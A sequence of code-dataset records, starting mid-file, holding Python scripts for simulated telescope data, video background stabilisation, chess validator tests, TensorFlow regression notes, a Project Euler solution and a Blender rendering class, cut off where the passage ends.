sequence duration between 1 and 3 hours\n seq_duration = timedelta(minutes=(random.random() * 120) + 60)\n end_time = start_time + seq_duration\n return start_time, end_time\n\n def build_psc(self, unit, camera, field, pic, coords, start_time, end_time):\n \"\"\"Generate a postage stamp cube with fake data for the given unit, PIC, and observation time.\n\n :param unit: ID of PANOPTES unit\n :param camera: ID of camera used to take image sequence\n :param field: name of field of original image sequence\n :param pic: PICID of star\n :param coords: coordinates of star, from SkyCoord\n :param start_time: start time of observation\n :param end_time: end time of observation\n :return: Header/Data Unit (HDU) of FITS file\n \"\"\"\n # Set PSC info - fake field, camera, exposure time, and sequence ID.\n obs_time = start_time\n target_name = 'field_{}'.format(field)\n seq_id = '{}_{}_{}'.format(\n unit, camera, obs_time.strftime('%Y%m%d_%H%M%SUT'))\n exptime = 100. # seconds\n sky_background = 1000.\n sky_sigma = 5.\n nx = 12\n ny = 16\n\n # Choose random pixel position of postage stamp in original image\n xpixorg = random.randint(0, 5184 - nx)\n ypixorg = random.randint(0, 3456 - ny)\n\n # Set metadata\n metadata = {'SEQID': seq_id,\n 'FIELD': target_name,\n 'RA': coords.ra.to(u.degree).value,\n 'DEC': coords.dec.to(u.degree).value,\n 'EQUINOX': coords.equinox.value,\n 'PICID': pic,\n 'OBSTIME': obs_time.isoformat(),\n 'XPIXORG': xpixorg,\n 'YPIXORG': ypixorg,\n }\n\n # Set times of exposures and add to metadata, with slightly random time\n # gap between images\n frame = 0\n while obs_time < end_time:\n gap = timedelta(0, exptime + np.random.normal(5, 1))\n obs_time = obs_time + gap\n time = 'TIME{:04d}'.format(frame)\n exp_time = 'EXPT{:04d}'.format(frame)\n metadata[time] = obs_time.isoformat()\n metadata[exp_time] = exptime\n frame += 1\n num_frames = frame\n\n # Make random datacube from normal distribution, with same pixel dimensions as actual\n # (but no meaningful data)\n data_cube = np.random.normal(\n sky_background, sky_sigma, (num_frames, ny, nx))\n hdu = fits.PrimaryHDU(data_cube)\n\n # Add metadata as FITS header and write to file\n hdu.header.extend(metadata.items())\n\n return hdu\n\n def write_psc(self, filename, hdu):\n \"\"\"Write PSC to file\"\"\"\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n hdu.writeto(filename, clobber=True)\n\n def build_lightcurve(self, hdu):\n \"\"\"Generate and write a JSON light curve from the PSC with randomized flux values.\n\n :param hdu: the FITS Header/Data Unit of the PSC\n :return: the light curve as a JSON object\n \"\"\"\n # Make random relative flux and flux uncertainty data\n lc = []\n for key in hdu.header:\n if key[:4] == \"TIME\":\n time = hdu.header[key]\n exptime = hdu.header['EXPT{}'.format(key[4:])]\n seq_id = hdu.header['SEQID']\n sig_r = 0.010\n sig_g = 0.006\n sig_b = 0.017\n r = np.random.normal(1, sig_r)\n g = np.random.normal(1, sig_g)\n b = np.random.normal(1, sig_b)\n entry = {\n 'time': time,\n 'exptime': exptime,\n 'R': r,\n 'G': g,\n 'B': b,\n 'sig_r': sig_r,\n 'sig_g': sig_g,\n 'sig_b': sig_b,\n 'seq_id': seq_id\n }\n lc.append(entry)\n return lc\n\n def write_lightcurve(self, filename, lc):\n \"\"\"Write light curve to file.\"\"\"\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'w') as FO:\n json.dump(lc, FO)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Generate data from a network of simulated PANOPTES units.')\n parser.add_argument('num_units', type=int, nargs='?', default=3,\n help='The number of PANOPTES units to simulate.')\n parser.add_argument('start_date', type=str,\n help='The start date of the simulated data, in Y-m-d format.')\n parser.add_argument('end_date', type=str,\n help='The end date of the simulated data, in Y-m-d format.')\n parser.add_argument('local_dir', type=str,\n help='The local directory in which to store the simulated data.')\n parser.add_argument('-c', '--cloud', action='store_true',\n help='Upload simulated data to Google Cloud Storage.')\n args = parser.parse_args()\n gen = DataGenerator(local_dir=args.local_dir, use_cloud=args.cloud)\n gen.generate_network(args.num_units, args.start_date,\n args.end_date, args.cloud)\n","sub_path":"scripts/generate_big_data_network.py","file_name":"generate_big_data_network.py","file_ext":"py","file_size_in_byte":15245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"117119392","text":"import cv2\nimport numpy as np\nimport time\nimport pafy\nfrom abc import ABCMeta, abstractmethod\nfrom tqdm import tqdm\n\n\nclass Generator(metaclass=ABCMeta):\n @abstractmethod\n def __init__(self, stream_path, color):\n pass\n\n @abstractmethod\n def generate(self):\n pass\n\n @abstractmethod\n def frame_count(self):\n return int\n\n\nclass StreamGenerator(Generator):\n def __init__(self, stream_path, color):\n self.cap = cv2.VideoCapture(stream_path)\n self.color = color\n\n def generate(self):\n while True:\n\n ret, frame = self.cap.read()\n\n if ret:\n if not self.color:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n yield cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)\n else:\n self.cap.release()\n cv2.destroyAllWindows()\n break\n\n def frame_count(self):\n return int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n\nclass YoutubeGenerator(StreamGenerator):\n def __init__(self, stream_path, color):\n vPafy = pafy.new(stream_path)\n play = vPafy.getbest(preftype=\"webm\")\n streams = vPafy.streams\n self.cap = cv2.VideoCapture(play.url)\n self.color = color\n\n\nclass Stream:\n def __new__(cls, stream_path, color):\n return StreamGenerator(stream_path, color)\n\n\nclass StreamYT:\n def __new__(cls, stream_path, color):\n return YoutubeGenerator(stream_path, color)\n\n\nclass Deque(metaclass=ABCMeta):\n def __init__(self):\n \"\"\"\n Create numpy multidimensional array\n representing grayscale or RGB with time dimension\n \"\"\"\n\n @abstractmethod\n def appendleft(self, frame):\n \"\"\"\n Simulate collections.deque.append__\n \"\"\"\n pass\n\n @abstractmethod\n def appendright(self, frame):\n \"\"\"\n Simulate collections.deque.append__\n \"\"\"\n pass\n\n\nclass NumpyDeque(Deque):\n def __init__(self, frame_shape, buffer_size):\n self.np_deque = np.zeros(shape=[buffer_size] + list(frame_shape))\n\n def appendleft(self, frame):\n self.np_deque = np.roll(self.np_deque, 1, axis=0)\n self.np_deque[0] = frame\n\n def appendright(self, frame):\n self.np_deque = np.roll(self.np_deque, -1, axis=0)\n self.np_deque[-1] = frame\n\n\nclass Properties:\n FPS = 10\n BUFFER_SIZE = int(3 * FPS)\n\n\nclass BackgroundStabilizator:\n def __init__(self, frame_shape, buffer_size):\n self.base_background = np.zeros(shape=frame_shape)\n self.numeque = NumpyDeque(frame_shape, buffer_size)\n self.start_increment = 0\n\n def append(self, frame):\n self.numeque.appendleft(frame)\n self.start_increment += 1\n\n def median(self):\n # np.save(\"x.npy\", self.numeque.np_deque)\n return np.uint8(np.median(self.numeque.np_deque, axis=0))\n\n def stable_pixels(self):\n \"\"\"\n Slow. High Quality. Best over long periods of time\n Needs medium deque and low frequency sampling (BUFFER = 100/EVERY 20-60)\n \"\"\"\n u, indices = np.unique(self.numeque.np_deque, return_inverse=True)\n axis = 0\n most_common = u[\n np.argmax(\n np.apply_along_axis(\n np.bincount,\n axis,\n indices.reshape(self.numeque.np_deque.shape),\n None,\n np.max(indices) + 1,\n ),\n axis=0,\n )\n ]\n return np.uint8(most_common)\n\n def average(self):\n \"\"\"\n NOTE:\n\n Fastest. Medium to High quality\n Needs huge deque and hight sampling (BUFFER = 400/EVERY 2)\n\n \"\"\"\n return np.uint8(np.average(self.numeque.np_deque, axis=0))\n\n def xappend(self, frame):\n self.base_background += frame\n\n\nclass StreamPipeline:\n def __init__(self, frame_source):\n self.source = frame_source\n self.base_shape = self.source.__next__().shape\n self.isrgb = False if len(self.base_shape) == 2 else True\n self.base_background = np.zeros(shape=self.base_shape)\n\n def pull(self):\n present_frame = self.source.__next__()\n\n\n# generator = frame_generator(1)\n\n# BCG = Background(generator)\n# print(BCG.isrgb)\n# NumpyDeque(BCG.base_background, Properties.BUFFER_SIZE)\n\n\nclass PPS(BackgroundStabilizator):\n BUFFER_SIZE = 25\n EVERY = 70\n FPS = 0.4\n\n def __init__(\n self, *args, BUFFER_SIZE=20, EVERY=10, stream=None, frame_count=0, **kwargs\n ):\n self.stream = stream\n print(kwargs, args)\n super().__init__(*args, **kwargs)\n self.background_container = {}\n self.pointer = {}\n self.increment = 0\n self.BUFFER_SIZE = BUFFER_SIZE\n self.EVERY = EVERY\n self.FRAME_COUNT = frame_count\n\n def index(self, frame_index):\n return int(frame_index / (self.BUFFER_SIZE * self.EVERY))\n\n def stabilize(self):\n for deq in tqdm(range(int(self.FRAME_COUNT / (self.EVERY * self.BUFFER_SIZE)))):\n for i in range(self.BUFFER_SIZE):\n self.stream.cap.set(cv2.CAP_PROP_POS_FRAMES, (deq + 1) * i * self.EVERY)\n ret, frame = self.stream.cap.read()\n if ret:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n self.append(cv2.resize(frame, (0, 0), fx=0.5, fy=0.5))\n else:\n raise Exception(\"No frame\")\n self.background_container[deq] = self.stable_pixels()\n\n self.stream.cap.set(1, 0)\n\n def background(self, index):\n try:\n return self.background_container[index]\n except Exception as e:\n print(e, 11)\n return self.background_container[index - 1]\n\n\nclass PPStabilizator(BackgroundStabilizator):\n BUFFER_SIZE = 20\n EVERY = 10\n FPS = 0.4\n FRAME_COUNT = 1832\n\n def __init__(self, *args, BUFFER_SIZE=20, EVERY=10, **kwargs):\n print(kwargs, args)\n super().__init__(*args, **kwargs)\n self.background_container = {}\n self.pointer = {}\n self.increment = 0\n self.BUFFER_SIZE = BUFFER_SIZE\n self.EVERY = EVERY\n\n def stabilize(self):\n print(\"START\")\n for deq in tqdm(range(int(self.FRAME_COUNT / (self.EVERY * self.BUFFER_SIZE)))):\n print(deq)\n for i in range(self.BUFFER_SIZE):\n self.cap.set(1, i * self.EVERY)\n ret, frame = self.cap.read()\n if ret:\n self.append(frame)\n else:\n raise Exception(\"No frame\")\n self.background_container[deq] = self.stable_pixels()\n\n def contain(self, frame_index, frame):\n if (frame_index + 1) % self.EVERY == 0:\n self.append(frame)\n print(\"append\", frame_index)\n if (frame_index + 1) % (self.BUFFER_SIZE * self.EVERY) == 0:\n # print('generate',frame_index)\n self.background_container[self.increment] = self.stable_pixels()\n self.increment += 1\n self.pointer[frame_index] = self.increment\n\n def background(self, frame_index):\n try:\n return self.background_container[self.pointer[frame_index]]\n except Exception as e:\n print(e, 11)\n return self.background_container[self.pointer[frame_index] - 1]\n","sub_path":"image_pipeline.py","file_name":"image_pipeline.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"189767271","text":"from .Helper import *\nfrom ..Chess.ChessValidator import ChessValidator\n\ndef testing_chess_validator_king_can_be_saved():\n result = []\n chess_validator = ChessValidator()\n\n # ------\n\n board = generate_board_from_string(\"\"\"\n8|R N B Q K B N |\n7|P P P P P P P P|\n6| |\n5| k R|\n4| |\n3| |\n2|p p p p p p p p|\n1|r n b q b n r|\n\"\"\")\n \n chess_validator.to_col = 'a'\n chess_validator.to_row = 3\n chess_validator.from_col = 'a'\n chess_validator.from_row = 2\n chess_validator.board = board\n chess_validator.active_player = 0\n chess_validator.attackers = [['h', 4]]\n with suppress_stdout():\n result.append(test_result( chess_validator.validate_king_can_be_saved(),\n f'Attacked by one Rook',\n line_number(),\n Expect.TRUE))\n\n # Check the to and from spots \n with suppress_stdout():\n result.append(test_result(\n (chess_validator.to_col == 'a' and chess_validator.to_row == 3 and\n chess_validator.from_col == 'a' and chess_validator.from_row == 2 and\n chess_validator.attackers == [['h', 4]]),\n f'Correctly restoring the old spots',\n line_number(),\n Expect.TRUE))\n\n # ------\n # Now check for when he can't escape \n\n board = generate_board_from_string(\"\"\"\n8| N B N |\n7|P P P P P P P P|\n6|R |\n5| Q k R|\n4| |\n3| B K |\n2|p p p p p p p p|\n1|r n b q b n r|\n\"\"\")\n\n chess_validator.board = board\n chess_validator.attackers = [['h', 4], ['c', 4]]\n with suppress_stdout():\n result.append(test_result(\n chess_validator.validate_king_can_be_saved(),\n 'Check mate by R,Q,B,K (King cannot be saved)',\n line_number(),\n Expect.FALSE))\n\n # ------\n # And at the end test for special cases\n\n boards = []\n boards.append(generate_board_from_string(\"\"\"\n8|R N B K B N R|\n7|P P P P P P P P|\n6| |\n5| Q |\n4| |\n3| |\n2|p p p p p p p|\n1|r n b q k b n r|\n\"\"\")) # 0\n boards.append(generate_board_from_string(\"\"\"\n8|R N B K B N R|\n7|P P P P P P P P|\n6| |\n5| |\n4| |\n3| |\n2|p p p p Q p p p|\n1|r n b q k b n r|\n\"\"\")) # 1\n boards.append(generate_board_from_string(\"\"\"\n8|R N B K B N R|\n7|P P P P P P P P|\n6| |\n5| |\n4| Q|\n3| |\n2|p p p p p p|\n1|r n b q k b n r|\n\"\"\")) # 2\n boards.append(generate_board_from_string(\"\"\"\n8|R N B B N R|\n7|P P P P P P P P|\n6| |\n5| |\n4| |\n3| K |\n2|p p p Q p p|\n1|r n b q k b n r|\n\"\"\")) # 3\n boards.append(generate_board_from_string(\"\"\"\n8|R N B Q K B R|\n7|P P P P P P P P|\n6| |\n5| |\n4| |\n3| N |\n2|p p p p p p p p|\n1|r n b q k b n r|\n\"\"\")) # 4\n boards.append(generate_board_from_string(\"\"\"\n8|R N B Q K B N |\n7|P P P P P P P P|\n6| |\n5| R |\n4|r |\n3| p p |\n2|p p p k p p|\n1| n b q b n r|\n\"\"\")) # 5\n\n attackers = [\n [['e', 4]],\n [['e', 1]],\n [['h', 3]],\n [['e', 1]],\n [['f', 2]],\n [['e', 4]],\n ]\n descriptions = [\n \"Other figure stepping in between\",\n \"King attacks attacker himself\",\n \"King stepps away\",\n \"Bishop or knight attacks attacker (king can't move)\",\n \"Someone attacks knight (king can't move)\",\n \"Rook steps in (king can't move)\",\n ]\n count = 0\n for board in boards:\n chess_validator.board = board\n chess_validator.attackers = attackers[count]\n with suppress_stdout():\n result.append(test_result(\n chess_validator.validate_king_can_be_saved(),\n descriptions[count] + f' (board {count})',\n line_number(),\n Expect.TRUE))\n count += 1\n\n # ------\n\n result.append('> Finished')\n return result","sub_path":"Server/Testing/testing_chess_validator_king_can_be_saved.py","file_name":"testing_chess_validator_king_can_be_saved.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"387352377","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n'''boston_hosing=tf.keras.datasets.boston_housing# 加载波士顿房价数据集\n(train_x,train_y),(test_x,test_y)=boston_hosing.load_data()\n# print(train_x.shape,train_y.shape)\n\n# 数据处理\nx_train=train_x[:,5]\ny_train=train_y\n\n\nx_test=test_x[:,5]\ny_test=test_y\n\n# 设置超参数\nlearn_rate=0.04\niter=2000\ndisplay_step=200\n\n# 设置模型参数初始值\nnp.random.seed(612)\nw=tf.Variable(np.random.randn())\nb=tf.Variable(np.random.randn())\n\n\n# 训练模型\nmse_train=[]\nmse_test=[]\n\nfor i in range(0,iter+1):\n with tf.GradientTape() as tape:\n pred_train=w*x_train+b# 求偏导的函数\n loss_train=0.5*tf.reduce_mean(tf.square(y_train-pred_train))# 损失函数公式\n\n pred_test = w * x_test + b # 求偏导的函数\n loss_test = 0.5 * tf.reduce_mean(tf.square(y_test - pred_test)) # 损失函数公式\n mse_train.append(loss_train)\n mse_test.append(loss_test)\n\n dl_dw,dl_db=tape.gradient(loss_train,[w,b])\n # 更新权值, w=w-learn_rate*dl_dw\n w.assign_sub(learn_rate*dl_dw) # tf.assign_sub(ref, value, use_locking=None, name=None) 释义:变量 ref 减去 value值,即 ref = ref - value\n b.assign_sub(learn_rate*dl_db)\n if i % display_step==0:\n print('i:%i,Train Loss: %f,Test Loss:%f'%(i,loss_train,loss_test))\n\n # 可视化\n plt.rcParams['font.sans-serif'] = ['SimHei'] # 设置显示字体\n plt.subplot(1,2,1)\n plt.plot(mse_train)\n plt.subplot(1,2,2)\n plt.plot(mse_test)\nplt.show()'''\n\n\n# 多元线性回归\n# 一维数组归一化\n\narea=np.array( [137.97, 104.50, 100.00, 124.32, 79.20, 99.00, 124.00, 114.00, 106, 138.05, 53.75, 46.91, 68.00, 63.02, 81.26,\n 86.21])\nroom=np.array([3,2,2,3,1,2,3,2,2,3,1,1,1,1,2,2])\nprint(area.shape)\n\n# 归一化,将数值全部统一为[0,1]范围内,房屋面积和房间数不是同一量级的数,归一化后可以归为同一量级\nx1=(area-area.min())/area.max()-area.min()\nx2=(room-room.min())/(room.max()-room.min())\n\n# 二维数组归一化----循环实现\n'''x=np.array([[3.0,10,500],\n [2.,20,200],\n [1.,30,300],\n [5.,50,100]])\nfor i in range(x.shape[1]):# x.shape()为列,每一列为一种属性值\n x[:,i]=(x[:,i]-x[:,i].min())/(x[:,i].max()-x[:,i].min())\nprint(x)'''\n\n# ********************* 广播运算 **************\nx=np.array([[3.0,10,500],\n [2.,20,200],\n [1.,30,300],\n [5.,50,100]])\n# print(x.min(axis=0))# 求每一列的最小值\n# print(x.max(axis=0))# 求每一列的最大值\ndiff=x.max(axis=0)-x.min(axis=0)\n# print(diff)\n(x-x.min(axis=0))/(x.max(axis=0)-x.min(axis=0))","sub_path":"python_code/tensorflow_studay/tensorflow基础/波士顿方法预测.py","file_name":"波士顿方法预测.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"383745344","text":"#The prime factors of 13195 are 5, 7, 13 and 29.\n#What is the largest prime factor of the number 600851475143 ?\n\n#5 * 7 * 13 * 29 = 13195\n\nimport math\n\ninputVal = 600851475143\n\nnewVal = inputVal\nlistPrimes = []\n\nwhile( newVal > math.sqrt(inputVal)-1 ):\n divisor = 2\n while (True):\n divisorCheck = newVal / divisor\n if divisorCheck == int(divisorCheck):\n listPrimes.append(divisor)\n newVal = newVal / divisor\n break\n divisor += 1\nif divisorCheck == int(divisorCheck):\n listPrimes.append(divisorCheck);\n\nprint (max(listPrimes))","sub_path":"Python/problem003.py","file_name":"problem003.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"333593124","text":"import os\nimport random\nimport platform\nimport bpy\n# import bpy_extras\nfrom mathutils import Matrix, Vector\nimport math\nimport numpy as np\nimport scipy.io\nimport imageio\nimport glob\nimport xml.etree.ElementTree as ET\n\nfrom math import pi ,sin, cos\n\n# custom libs\nimport os.path as osp\nimport sys\nimport argparse\n\n#>>>>>>>>>>>>>>>>>>>>>>>> global <<<<<<<<<<<<<<<<<<<<<<<<<<<<#\nRENDERING_PATH = './'\nMAX_CAMERA_DIST = 2\nMAX_DEPTH = 1e8\nFACTOR_DEPTH = 0.1\n\ng_syn_light_num_lowbound = 4\ng_syn_light_num_highbound = 6\ng_syn_light_dist_lowbound = 8\ng_syn_light_dist_highbound = 12\ng_syn_light_azimuth_degree_lowbound = 0\ng_syn_light_azimuth_degree_highbound = 360\ng_syn_light_elevation_degree_lowbound = 0\ng_syn_light_elevation_degree_highbound = 90\ng_syn_light_energy_mean = 3\ng_syn_light_energy_std = 0.5\ng_syn_light_environment_energy_lowbound = 0\ng_syn_light_environment_energy_highbound = 1\n#>>>>>>>>>>>>>>>>>>>>>>>> ends here <<<<<<<<<<<<<<<<<<<<<<<<<#\n\ndef breakpoint():\n import pdb;pdb.set_trace()\n\ndef add_path(path):\n if path not in sys.path:\n sys.path.insert(0, path)\n\nclass active: \n # operations on active objects\n def rename(objName):\n bpy.context.object.name = objName\n\nclass select:\n # operations on selected objects\n # Declarative\n def scale(objName, v):\n bpy.data.objects[objName].scale = v\n # Declarative\n def location(objName, v):\n bpy.data.objects[objName].location = v\n # Declarative\n def rotation(objName, v):\n bpy.data.objects[objName].rotation_euler = v\n\n# create primitives\nclass create:\n \"\"\"Function Class for CREATING Objects\"\"\"\n def cube(objName, v=0.5):\n bpy.ops.mesh.primitive_cube_add(radius=v, location=(0, 0, 0))\n active.rename(objName)\n def sphere(objName, v=0.5):\n bpy.ops.mesh.primitive_uv_sphere_add(size=v, location=(0, 0, 0))\n active.rename(objName)\n def cone(objName, v=0.5):\n bpy.ops.mesh.primitive_cone_add(radius1=v, location=(0, 0, 0))\n active.rename(objName)\n\ndef camPosToQuaternion(cx, cy, cz):\n camDist = math.sqrt(cx * cx + cy * cy + cz * cz)\n cx = cx / camDist\n cy = cy / camDist\n cz = cz / camDist\n axis = (-cz, 0, cx)\n angle = math.acos(cy)\n a = math.sqrt(2) / 2\n b = math.sqrt(2) / 2\n w1 = axis[0]\n w2 = axis[1]\n w3 = axis[2]\n c = math.cos(angle / 2)\n d = math.sin(angle / 2)\n q1 = a * c - b * d * w1\n q2 = b * c + a * d * w1\n q3 = a * d * w2 + b * d * w3\n q4 = -b * d * w2 + a * d * w3\n return (q1, q2, q3, q4)\n\ndef quaternionFromYawPitchRoll(yaw, pitch, roll):\n c1 = math.cos(yaw / 2.0)\n c2 = math.cos(pitch / 2.0)\n c3 = math.cos(roll / 2.0)\n s1 = math.sin(yaw / 2.0)\n s2 = math.sin(pitch / 2.0)\n s3 = math.sin(roll / 2.0)\n q1 = c1 * c2 * c3 + s1 * s2 * s3\n q2 = c1 * c2 * s3 - s1 * s2 * c3\n q3 = c1 * s2 * c3 + s1 * c2 * s3\n q4 = s1 * c2 * c3 - c1 * s2 * s3\n return (q1, q2, q3, q4)\n\n\ndef camPosToQuaternion(cx, cy, cz):\n q1a = 0\n q1b = 0\n q1c = math.sqrt(2) / 2\n q1d = math.sqrt(2) / 2\n camDist = math.sqrt(cx * cx + cy * cy + cz * cz)\n cx = cx / camDist\n cy = cy / camDist\n cz = cz / camDist\n t = math.sqrt(cx * cx + cy * cy)\n tx = cx / t\n ty = cy / t\n yaw = math.acos(ty)\n if tx > 0:\n yaw = 2 * math.pi - yaw\n pitch = 0\n tmp = min(max(tx*cx + ty*cy, -1),1)\n #roll = math.acos(tx * cx + ty * cy)\n roll = math.acos(tmp)\n if cz < 0:\n roll = -roll\n print(\"%f %f %f\" % (yaw, pitch, roll))\n q2a, q2b, q2c, q2d = quaternionFromYawPitchRoll(yaw, pitch, roll)\n q1 = q1a * q2a - q1b * q2b - q1c * q2c - q1d * q2d\n q2 = q1b * q2a + q1a * q2b + q1d * q2c - q1c * q2d\n q3 = q1c * q2a - q1d * q2b + q1a * q2c + q1b * q2d\n q4 = q1d * q2a + q1c * q2b - q1b * q2c + q1a * q2d\n return (q1, q2, q3, q4)\n\ndef camRotQuaternion(cx, cy, cz, theta):\n theta = theta / 180.0 * math.pi\n camDist = math.sqrt(cx * cx + cy * cy + cz * cz)\n cx = -cx / camDist\n cy = -cy / camDist\n cz = -cz / camDist\n q1 = math.cos(theta * 0.5)\n q2 = -cx * math.sin(theta * 0.5)\n q3 = -cy * math.sin(theta * 0.5)\n q4 = -cz * math.sin(theta * 0.5)\n return (q1, q2, q3, q4)\n\ndef quaternionProduct(qx, qy):\n a = qx[0]\n b = qx[1]\n c = qx[2]\n d = qx[3]\n e = qy[0]\n f = qy[1]\n g = qy[2]\n h = qy[3]\n q1 = a * e - b * f - c * g - d * h\n q2 = a * f + b * e + c * h - d * g\n q3 = a * g - b * h + c * e + d * f\n q4 = a * h + b * g - c * f + d * e\n return (q1, q2, q3, q4)\n\ndef obj_lookat_positioned_camera_pos(dist, azimuth_deg, elevation_deg):\n phi = float(elevation_deg) / 180 * math.pi\n theta = float(azimuth_deg) / 180 * math.pi\n x = (dist * math.cos(theta) * math.cos(phi))\n y = (dist * math.sin(theta) * math.cos(phi))\n z = (dist * math.sin(phi))\n return (x, y, z)\n\nclass BlenderRenderer(object):\n\n def __init__(self, viewport_size_x, viewport_size_y):\n '''\n viewport_size_x, viewport_size_y: rendering viewport resolution\n '''\n # remove the default cube\n bpy.ops.object.select_pattern(pattern=\"Cube\")\n bpy.ops.object.delete()\n\n render_context = bpy.context.scene.render\n world = bpy.context.scene.world\n camera = bpy.data.objects['Camera']\n\n # set the camera postion and orientation so that it is in\n # the front of the object\n camera.location = (1, 0, 0)\n\n # render setting\n render_context.resolution_percentage = 100\n world.horizon_color = (1, 1, 1) # set background color to be white\n\n # set file name for storing temporary rendering result\n self.result_fn= '%s/render_result_%d.png' % (RENDERING_PATH, os.getpid())\n bpy.context.scene.render.filepath = self.result_fn\n\n # switch on nodes\n bpy.context.scene.use_nodes = True\n bpy.context.scene.view_settings.view_transform = 'Raw'\n tree = bpy.context.scene.node_tree\n links = tree.links\n\n # clear default nodes\n for n in tree.nodes:\n tree.nodes.remove(n)\n\n # create input render layer node\n rl = tree.nodes.new('CompositorNodeRLayers')\n\n # gamma = tree.nodes.new('CompositorNodeGamma')\n # gamma.inputs[1].default_value = 2.2\n # links.new(rl.outputs[2], gamma.inputs[0])\n\n\n # create node viewer\n v = tree.nodes.new('CompositorNodeViewer')\n links.new(rl.outputs[2], v.inputs[0]) # link Image output to Viewer input\n\n # create map value layer node\n # map = tree.nodes.new(type=\"CompositorNodeMapValue\")\n # map.size = [FACTOR_DEPTH]\n # map.use_min = True\n # map.min = [0]\n # map.use_max = True\n # map.max = [256]\n # links.new(rl.outputs[2], map.inputs[0])\n\n # create output node\n fileOutput = tree.nodes.new(type=\"CompositorNodeOutputFile\")\n fileOutput.base_path = \"./new_data/0000\"\n fileOutput.format.file_format = 'OPEN_EXR'\n fileOutput.format.color_depth= '32'\n fileOutput.file_slots[0].path = 'depth#'\n # links.new(map.outputs[0], fileOutput.inputs[0])\n links.new(rl.outputs[2], fileOutput.inputs[0])\n # links.new(gamma.outputs[0], fileOutput.inputs[0])\n\n self.render_context = render_context\n\n self.node_tree = tree\n self.fileOutput = fileOutput\n\n self.camera = camera\n self.model_loaded = False\n self.render_context.resolution_x = viewport_size_x\n self.render_context.resolution_y = viewport_size_y\n self.render_context.use_antialiasing = False\n\n self.dirname = 'new_data/0000'\n\n def _set_lighting(self, light_info=[], environment_energy=None):\n # clear default lights\n bpy.ops.object.select_by_type(type='LAMP')\n bpy.ops.object.delete(use_global=False)\n\n # set environment lighting\n bpy.context.scene.world.light_settings.use_environment_light = True\n bpy.context.scene.world.light_settings.environment_color = 'PLAIN'\n\n # if light info is specified\n if len(light_info):\n bpy.context.scene.world.light_settings.environment_energy = environment_energy\n for info in light_info:\n light_azimuth_deg = info[0]\n light_elevation_deg = info[1]\n light_dist = info[2]\n light_energy = info[3]\n\n lx, ly, lz = obj_lookat_positioned_camera_pos(light_dist, light_azimuth_deg, light_elevation_deg)\n bpy.ops.object.lamp_add(type='POINT', view_align=False, location=(lx, ly, lz))\n bpy.data.objects['Point'].data.energy = light_energy\n else: # randomly get a new set of lights\n bpy.context.scene.world.light_settings.environment_energy = np.random.uniform(\n g_syn_light_environment_energy_lowbound, g_syn_light_environment_energy_highbound)\n\n # set point lights\n num_light = random.randint(g_syn_light_num_lowbound,g_syn_light_num_highbound)\n print(num_light)\n light_info = np.zeros((num_light, 4), dtype=np.float32)\n for i in range(num_light):\n light_azimuth_deg = np.random.uniform(g_syn_light_azimuth_degree_lowbound, g_syn_light_azimuth_degree_highbound)\n light_elevation_deg = np.random.uniform(g_syn_light_elevation_degree_lowbound, g_syn_light_elevation_degree_highbound)\n light_dist = np.random.uniform(g_syn_light_dist_lowbound, g_syn_light_dist_highbound)\n lx, ly, lz = obj_lookat_positioned_camera_pos(light_dist, light_azimuth_deg, light_elevation_deg)\n bpy.ops.object.lamp_add(type='POINT', view_align = False, location=(lx, ly, lz))\n light_energy = np.random.normal(g_syn_light_energy_mean, g_syn_light_energy_std)\n bpy.data.objects['Point'].data.energy = light_energy\n\n light_info[i, 0] = light_azimuth_deg\n light_info[i, 1] = light_elevation_deg\n light_info[i, 2] = light_dist\n light_info[i, 3] = light_energy\n\n self.environment_energy = bpy.context.scene.world.light_settings.environment_energy\n self.light_info = light_info\n\n\n def setViewpoint(self, azimuth, altitude, yaw, distance_ratio, fov, lookat_position=None):\n\n cx, cy, cz = obj_lookat_positioned_camera_pos(distance_ratio * MAX_CAMERA_DIST, azimuth, altitude)\n q1 = camPosToQuaternion(cx, cy, cz)\n q2 = camRotQuaternion(cx, cy, cz, yaw)\n q = quaternionProduct(q2, q1)\n\n if lookat_position is not None:\n self.camera.location[0] = cx + lookat_position[0]\n self.camera.location[1] = cy + lookat_position[1]\n self.camera.location[2] = cz + lookat_position[2]\n else:\n self.camera.location[0] = cx\n self.camera.location[1] = cy\n self.camera.location[2] = cz\n\n self.camera.rotation_mode = 'QUATERNION'\n self.camera.rotation_quaternion[0] = q[0]\n self.camera.rotation_quaternion[1] = q[1]\n self.camera.rotation_quaternion[2] = q[2]\n self.camera.rotation_quaternion[3] = q[3]\n\n self.azimuth = azimuth\n self.elevation = altitude\n self.tilt = yaw\n self.distance = distance_ratio * MAX_CAMERA_DIST\n\n def setTransparency(self, transparency='SKY'):\n \"\"\" transparency is either 'SKY', 'TRANSPARENT'\n If set 'SKY', render background using sky color.\"\"\"\n self.render_context.alpha_mode = transparency\n\n def makeMaterial(self, name, diffuse, specular, alpha):\n mat = bpy.data.materials.new(name)\n mat.diffuse_color = diffuse\n mat.diffuse_shader = 'LAMBERT'\n mat.diffuse_intensity = 1.0\n mat.specular_color = specular\n mat.specular_shader = 'COOKTORR'\n mat.specular_intensity = 0.5\n mat.alpha = alpha\n mat.ambient = 1\n mat.use_transparency = True\n mat.transparency_method = 'Z_TRANSPARENCY'\n mat.use_shadeless = True\n mat.use_face_texture = False\n return mat\n\n def selectModel(self):\n bpy.ops.object.select_all(action='DESELECT')\n bpy.ops.object.select_pattern(pattern=\"Camera\")\n 